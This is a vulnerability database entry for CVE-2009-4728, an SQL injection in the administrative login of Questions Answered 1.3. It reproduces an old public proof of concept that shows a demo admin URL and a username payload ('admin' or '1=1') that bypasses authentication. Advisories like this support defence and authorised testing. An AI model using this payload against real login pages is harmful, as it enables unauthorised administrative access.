CVE-2009-4728
Description
SQL injection vulnerability in the administrative interface in Questions Answered 1.3 allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Questions Answered 1.3 - Authentication Bypass
#--------------------------------------------------------
#Questions Answered v1.3 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr
#Mail: snakespc@gmail.com
#-------------------------------------------------------
#
#Script:Questions Answered v1.3
#
#Demo:www.nichewebsite.net
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://demo.nichewebsite.net/admin
#Username:admin' or '1=1
#Password:Super Cristal
----------------------------------------------------------
# milw0rm.com [2009-08-03]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| questions_answered | questions_answered | 1.3 | |
References
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.